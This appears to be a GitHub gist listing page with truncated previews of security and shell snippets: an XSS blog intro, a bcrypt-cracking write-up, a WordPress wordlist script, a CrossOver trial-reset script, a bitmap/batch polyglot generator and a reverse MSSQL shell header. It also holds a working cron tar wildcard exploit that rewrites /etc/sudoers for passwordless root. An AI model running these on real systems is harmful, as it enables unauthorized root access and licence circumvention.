@paj28
paj28 / index.md
Last active February 13, 2025 17:04

Unicode XSS via Combining Characters

Most application security practitioners are familiar with Unicode XSS, which typically arises from the Unicode character fullwidth-less-than-sign. It’s not a common vulnerability but does occasionally appear in applications that otherwise have good XSS protection. In this blog I describe another variant of Unicode XSS that I have identified, using combining characters. I’ve not observed this in the wild, so it’s primarily of theoretical concern. But the scenario is not entirely implausible and I’ve not otherwise seen this technique discussed, so I hope this is useful.

Recap of Unicode XSS

Lab: https://4t64ubva.xssy.uk/

A quick investigation of the lab shows that it is echoing the name parameter, and performing HTML escaping:

@Roni-Carta
Roni-Carta / wp-wordlist.sh
Created July 29, 2022 19:52
wp-wordlist helps you create a wordlist of all the WordPress themes and plugins available
wp-wordlist()
{
    option="$1"
    if [[ "$option" == *"plugin"* ]]; then
        curl -s https://plugins.svn.wordpress.org/ | tail -n +5 | sed -e 's/<[^>]*>//g' -e 's/\///' -e 's/ \+//gp' | grep -v "Powered by Apache" | sort -u
    elif [[ "$option" == *"theme"* ]]; then
        curl -s https://themes.svn.wordpress.org/ | tail -n +5 | sed -e 's/<[^>]*>//g' -e 's/\///' -e 's/ \+//gp' | grep -v "Powered by Apache" | sort -u
    fi
}
@wrongbyte
wrongbyte / bcrypt.md
Last active December 19, 2024 03:10
Cracking a hashed password

Given a hashed password $2y$12$Dwt1BZj6pcyc3Dy1FWZ5ieeUznr71EeNkJkUlypTsgbX1H68wsRom, we have only one hint: the password has four letters, all lowercase.

Let's start: finding the hash type

There are a lot of hash types out there. A good way to start is to look at the hashed password and try to find some kind of pattern. Here, the key is the first 4 characters of the hash. There is a page where you can look at example hashes: https://hashcat.net/wiki/doku.php?id=example_hashes. Noticed something? We are looking for the entry bcrypt $2*$, Blowfish (Unix). Our $2y$ matches this pattern, so we are dealing with a bcrypt hash. We can also see that the hash was generated using a cost factor of 12 (it is the number that comes after the first four characters).

Let's crack!

First, it is important to know how the process works. Hashing is fundamentally different from encryption: it only works in one direction. This means that we cannot really recover the plaintext of a hashed

@santaklouse
santaklouse / CrossOver.sh
Last active April 3, 2025 04:47
unlimited CrossOver trial (MacOS)
#!/usr/bin/env bash
# check if pidof exists
PIDOF="$(which pidof)"
# and if not - install it
(test "${PIDOF}" && test -f "${PIDOF}") || brew install pidof
# find app in default paths
CO_PWD=~/Applications/CrossOver.app/Contents/MacOS
test -d "${CO_PWD}" || CO_PWD=/Applications/CrossOver.app/Contents/MacOS
@Hakky54
Hakky54 / openssl_commands.md
Last active March 25, 2025 14:14 — forked from p3t3r67x0/openssl_commands.md
OpenSSL Cheat Sheet

OpenSSL Cheat Sheet 🔐

Install

Install OpenSSL on Debian-based systems

sudo apt-get install openssl
@noize-e
noize-e / firewall.sh
Created May 29, 2019 06:48
macOS socketfilterfw firewall decorator
#!/usr/bin/env bash
set -o errexit
set -o errtrace
usage() {
printf "\
macOS socketfilterfw decorator.
firewall [-command] [args]
@CaptBoykin
CaptBoykin / linux_privesc_cron_tar_wildcard.txt
Last active October 10, 2022 10:09
Cron Tar Wildcard Injection (Linux Privesc)
// https://www.hackingarticles.in/linux-privilege-escalation-by-exploiting-cron-jobs/
// This will replace sudoers. Add your user to <INSERT YOUR USER HERE>
echo 'echo "Defaults env_reset" > /etc/sudoers' >> test.sh
echo 'echo "Defaults mail_badpass" >> /etc/sudoers' >> test.sh
echo 'echo "Defaults secure_path=\"/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin\" ">> /etc/sudoers' >> test.sh
echo 'echo "root ALL=(ALL:ALL) ALL" >> /etc/sudoers' >> test.sh
echo 'echo "%sudo ALL=(ALL:ALL) ALL" >> /etc/sudoers' >> test.sh
echo 'echo "<INSERT YOUR USER HERE> ALL=(ALL) NOPASSWD:ALL" >> /etc/sudoers' >> test.sh
echo "" > "--checkpoint-action=exec=sh test.sh"
echo "" > --checkpoint=1
@FrankSpierings
FrankSpierings / bitchmap.py
Last active June 4, 2019 10:01
Create a bitmap file which can be used as a cmd/batch file
#!/usr/bin/python3
#
#Based on: https://www.thelacunablog.com/open-command-prompt-ms-paint.html
import struct
from PIL import Image
def imagegen(s, path):
    # Fix header
    s = '\x00\x00\x0a\x0d\x0a\x0d' + s
@amit-chahar
amit-chahar / download-script.sh
Last active February 20, 2023 12:57
Script to download files from Google drive using curl (Detailed explanation can be read here: https://stackoverflow.com/a/49444877/4043524)
#!/bin/bash
fileid="FILEIDENTIFIER"
filename="FILENAME"
curl -c ./cookie -s -L "https://drive.google.com/uc?export=download&id=${fileid}" > /dev/null
curl -Lb ./cookie "https://drive.google.com/uc?export=download&confirm=`awk '/download/ {print $NF}' ./cookie`&id=${fileid}" -o ${filename}
@xassiz
xassiz / mandros.py
Created March 16, 2018 07:53
Reverse MSSQL shell
import sys
import requests
import threading
import HTMLParser
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler
'''
Description: Reverse MSSQL shell through xp_cmdshell + certutil for exfiltration
Author: @xassiz
'''